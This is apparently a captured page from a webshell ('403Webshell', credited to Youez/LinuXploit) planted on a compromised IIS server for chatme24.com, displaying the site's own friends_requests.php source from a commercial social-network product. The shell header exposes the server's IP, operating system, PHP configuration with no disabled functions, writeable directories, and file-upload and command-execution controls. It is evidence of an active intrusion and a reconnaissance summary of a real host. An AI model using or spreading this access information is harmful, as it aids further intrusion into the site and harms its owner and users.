403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot//friends_requests.php
<?php
/* (C) Websplosion LLC, 2001-2021

IMPORTANT: This is a commercial software product
and any kind of using it must agree to the Websplosion's license agreement.
It can be found at http://www.chameleonsocial.com/license.doc

This notice may not be removed from the source code. */

$area = "login";
include("./_include/core/main_start.php");
include("./_include/current/friends.php");

function do_action()
{
	global $g_user;

	$user_id = get_param('user_id');
    $responseData = false;
    $redirect = 'home.php';
	if($user_id) {
		DB::query('SELECT * FROM user WHERE user_id=' . to_sql($user_id));
		if($user = DB::fetch_row()) {
			if($user['user_id'] != $g_user['user_id']) {
                $sql = 'SELECT * FROM friends_requests
                         WHERE user_id IN (' . to_sql($user['user_id'], 'Number') . ',' . to_sql(guid(), 'Number') . ')
                           AND friend_id IN (' . to_sql($user['user_id'], 'Number') . ',' . to_sql(guid(), 'Number') . ')';
				DB::query($sql);
				if($request = DB::fetch_row()){
					$action = get_param('action');
					if($action == 'approve' && $request['user_id'] == $user['user_id']) {
                        User::friendApprove($user['user_id'], guid());
                        $responseData = true;
                        $redirect = 'friends_add_confirmed.php?user_id=' . $user['user_id'];
					} elseif ($action == 'decline' && $request['user_id'] == $user['user_id']) {
                        User::friendDecline($user['user_id'], guid());
                        $responseData = true;
                        $redirect = 'my_friends.php?show=requests';
					} elseif($action == 'remove') {
                        User::friendDelete(guid(), $user['user_id']);
                        $responseData = true;
                        $redirect = 'my_friends.php?show=all';
					}
				}
			}
		}
	}
    $isAjaxResponse = get_param('ajax');
    if ($isAjaxResponse) {
        die(getResponseDataAjaxByAuth($responseData));
    } else {
        redirect($redirect);
    }
}

do_action();

include("./_include/core/main_close.php");

Youez - 2016 - github.com/yon3zu
LinuXploit